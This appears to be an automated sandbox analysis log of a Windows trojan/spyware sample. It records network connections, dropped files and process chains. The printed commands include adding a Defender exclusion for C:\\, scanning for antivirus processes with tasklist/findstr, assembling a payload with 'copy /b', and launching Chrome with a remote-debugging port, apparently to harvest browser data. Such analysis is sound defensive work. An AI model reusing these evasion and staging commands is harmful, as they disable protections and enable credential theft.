Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 159.69.102.165:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49829 version: TLS 1.2

Source: C:\ProgramData\din.exe

Code function: 6_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

6_2_004050F9

Source: C:\ProgramData\din.exe

Code function: 6_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

6_2_004044D1

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1913420 NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,WakeByAddressSingle,WakeByAddressSingle,WakeByAddressSingle,WakeByAddressSingle,RtlNtStatusToDosError,WakeByAddressSingle,	0_2_00007FF6B1913420
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19A82F0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,	0_2_00007FF6B19A82F0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1914160 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,GetLastError,CloseHandle,	0_2_00007FF6B1914160
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19124E0 NtCancelIoFileEx,HeapFree,HeapFree,RtlNtStatusToDosError,	0_2_00007FF6B19124E0

Source: C:\Users\user\Desktop\xoJxSAotVM.exe

Code function: 0_2_00007FF6B1913420: NtCancelIoFileEx,NtDeviceIoControlFile,RtlNtStatusToDosError,WakeByAddressSingle,WakeByAddressSingle,WakeByAddressSingle,WakeByAddressSingle,RtlNtStatusToDosError,WakeByAddressSingle,

0_2_00007FF6B1913420

Source: C:\ProgramData\din.exe

Code function: 6_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,

6_2_004038AF

Source: C:\ProgramData\din.exe	File created: C:\Windows\ImAnt	Jump to behavior
Source: C:\ProgramData\din.exe	File created: C:\Windows\BillyLiberty	Jump to behavior
Source: C:\ProgramData\din.exe	File created: C:\Windows\ShakespeareSerious	Jump to behavior
Source: C:\ProgramData\din.exe	File created: C:\Windows\RrDrink	Jump to behavior
Source: C:\ProgramData\din.exe	File created: C:\Windows\MountainsPremiere	Jump to behavior
Source: C:\ProgramData\din.exe	File created: C:\Windows\HarvestSectors	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B192B330	0_2_00007FF6B192B330
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19C9220	0_2_00007FF6B19C9220
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19DB220	0_2_00007FF6B19DB220
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B193B231	0_2_00007FF6B193B231
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18B3410	0_2_00007FF6B18B3410
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1913420	0_2_00007FF6B1913420
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B194F42F	0_2_00007FF6B194F42F
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19C7890	0_2_00007FF6B19C7890
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B195DCD0	0_2_00007FF6B195DCD0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18CBBFD	0_2_00007FF6B18CBBFD
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19E1DC0	0_2_00007FF6B19E1DC0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19680D0	0_2_00007FF6B19680D0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19DA0A0	0_2_00007FF6B19DA0A0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19B22D0	0_2_00007FF6B19B22D0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1956190	0_2_00007FF6B1956190
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18FE6B0	0_2_00007FF6B18FE6B0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1924980	0_2_00007FF6B1924980
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1926D01	0_2_00007FF6B1926D01
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1958E60	0_2_00007FF6B1958E60
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B191D320	0_2_00007FF6B191D320
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1907278	0_2_00007FF6B1907278
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A07280	0_2_00007FF6B1A07280
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B191F1E0	0_2_00007FF6B191F1E0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18C5210	0_2_00007FF6B18C5210
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18ED140	0_2_00007FF6B18ED140
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19EF490	0_2_00007FF6B19EF490
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18BB410	0_2_00007FF6B18BB410
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18C1430	0_2_00007FF6B18C1430
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19253F9	0_2_00007FF6B19253F9
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1911340	0_2_00007FF6B1911340
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19BB670	0_2_00007FF6B19BB670
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19AB610	0_2_00007FF6B19AB610
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B190D570	0_2_00007FF6B190D570
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B194B550	0_2_00007FF6B194B550
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19418F2	0_2_00007FF6B19418F2
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1909890	0_2_00007FF6B1909890
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18BD7F0	0_2_00007FF6B18BD7F0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19157D0	0_2_00007FF6B19157D0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A01800	0_2_00007FF6B1A01800
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A03780	0_2_00007FF6B1A03780
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A05B20	0_2_00007FF6B1A05B20
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19ABB10	0_2_00007FF6B19ABB10
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B190F9C0	0_2_00007FF6B190F9C0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19A5CF0	0_2_00007FF6B19A5CF0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18BFCF0	0_2_00007FF6B18BFCF0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B190DCC0	0_2_00007FF6B190DCC0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18BBC70	0_2_00007FF6B18BBC70
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18CFBB6	0_2_00007FF6B18CFBB6
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18CFBEB	0_2_00007FF6B18CFBEB
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18CFC2E	0_2_00007FF6B18CFC2E
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18CFB42	0_2_00007FF6B18CFB42
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1959B50	0_2_00007FF6B1959B50
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1979B90	0_2_00007FF6B1979B90
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D9EE0	0_2_00007FF6B18D9EE0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A01F10	0_2_00007FF6B1A01F10
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1983E60	0_2_00007FF6B1983E60
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1987E50	0_2_00007FF6B1987E50
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18C1D40	0_2_00007FF6B18C1D40
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19E7D50	0_2_00007FF6B19E7D50
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D80EB	0_2_00007FF6B18D80EB
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D811F	0_2_00007FF6B18D811F
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B190E040	0_2_00007FF6B190E040
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19100B0	0_2_00007FF6B19100B0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18EC0A0	0_2_00007FF6B18EC0A0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A03FF0	0_2_00007FF6B1A03FF0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D7FF0	0_2_00007FF6B18D7FF0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1941F7D	0_2_00007FF6B1941F7D
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19CBF80	0_2_00007FF6B19CBF80
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B190BF90	0_2_00007FF6B190BF90
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19CC2C0	0_2_00007FF6B19CC2C0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A061F0	0_2_00007FF6B1A061F0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D81EC	0_2_00007FF6B18D81EC
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D820D	0_2_00007FF6B18D820D
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19EC210	0_2_00007FF6B19EC210
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19A6160	0_2_00007FF6B19A6160
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D8187	0_2_00007FF6B18D8187
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B193A190	0_2_00007FF6B193A190
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19A6510	0_2_00007FF6B19A6510
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19BA4B0	0_2_00007FF6B19BA4B0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18EA4A0	0_2_00007FF6B18EA4A0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D84A0	0_2_00007FF6B18D84A0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19A83E0	0_2_00007FF6B19A83E0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19603D0	0_2_00007FF6B19603D0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A046E0	0_2_00007FF6B1A046E0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19D86C0	0_2_00007FF6B19D86C0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B197C540	0_2_00007FF6B197C540
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18BE5A0	0_2_00007FF6B18BE5A0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B197E850	0_2_00007FF6B197E850
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18BC890	0_2_00007FF6B18BC890
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18F4890	0_2_00007FF6B18F4890
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B190A890	0_2_00007FF6B190A890
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18C0740	0_2_00007FF6B18C0740
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19BA770	0_2_00007FF6B19BA770
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18FA780	0_2_00007FF6B18FA780
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B194CAC0	0_2_00007FF6B194CAC0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B190CB30	0_2_00007FF6B190CB30
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1918A70	0_2_00007FF6B1918A70
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18FCAA0	0_2_00007FF6B18FCAA0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A089D0	0_2_00007FF6B1A089D0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18DCA30	0_2_00007FF6B18DCA30
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18CA990	0_2_00007FF6B18CA990
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B190AC60	0_2_00007FF6B190AC60
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D6EF0	0_2_00007FF6B18D6EF0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B190EE90	0_2_00007FF6B190EE90
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19C8DE0	0_2_00007FF6B19C8DE0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B191B0E0	0_2_00007FF6B191B0E0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19AF110	0_2_00007FF6B19AF110
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19AD040	0_2_00007FF6B19AD040
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19CCFE0	0_2_00007FF6B19CCFE0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19C8FC0	0_2_00007FF6B19C8FC0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18F7020	0_2_00007FF6B18F7020
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A08F40	0_2_00007FF6B1A08F40
Source: C:\ProgramData\din.exe	Code function: 6_2_0040737E	6_2_0040737E
Source: C:\ProgramData\din.exe	Code function: 6_2_00406EFE	6_2_00406EFE
Source: C:\ProgramData\din.exe	Code function: 6_2_004079A2	6_2_004079A2
Source: C:\ProgramData\din.exe	Code function: 6_2_004049A8	6_2_004049A8

Source: C:\ProgramData\din.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: String function: 00007FF6B1A014B0 appears 68 times
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: String function: 00007FF6B1A01110 appears 215 times

Source: HLNYCB.16.dr	Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
Source: xoJxSAotVM.exe	Binary string: Failed to open \Device\Afd\Mio:
Source: xoJxSAotVM.exe	Binary string: 0\Device\Afd\Mio

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@48/41@7/7

Source: C:\ProgramData\din.exe

6_2_004044D1

Source: C:\ProgramData\din.exe

Code function: 6_2_004024FB CoCreateInstance,

6_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\GJ13LFBF.htm

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fuznuhat.cqw.ps1

Jump to behavior

Source: xoJxSAotVM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\ProgramData\din.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\xoJxSAotVM.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: GVAAAAAIE.16.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\xoJxSAotVM.exe "C:\Users\user\Desktop\xoJxSAotVM.exe"
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C C:\ProgramData\din.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\din.exe C:\ProgramData\din.exe
Source: C:\ProgramData\din.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Gone Gone.cmd && Gone.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 112974
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ApplianceFellowshipWhileRegistry" Beverly
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bulgarian + ..\Apply + ..\Legs + ..\Rules + ..\Vat + ..\July + ..\Gamma + ..\Geographic r
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\112974\Decade.com Decade.com r
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2564,i,11302442274769485425,11436489029941999890,262144 /prefetch:8
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\"	Jump to behavior
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C C:\ProgramData\din.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\din.exe C:\ProgramData\din.exe	Jump to behavior
Source: C:\ProgramData\din.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Gone Gone.cmd && Gone.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 112974	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ApplianceFellowshipWhileRegistry" Beverly	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Bulgarian + ..\Apply + ..\Legs + ..\Rules + ..\Vat + ..\July + ..\Gamma + ..\Geographic r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\112974\Decade.com Decade.com r	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\112974\Decade.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2564,i,11302442274769485425,11436489029941999890,262144 /prefetch:8
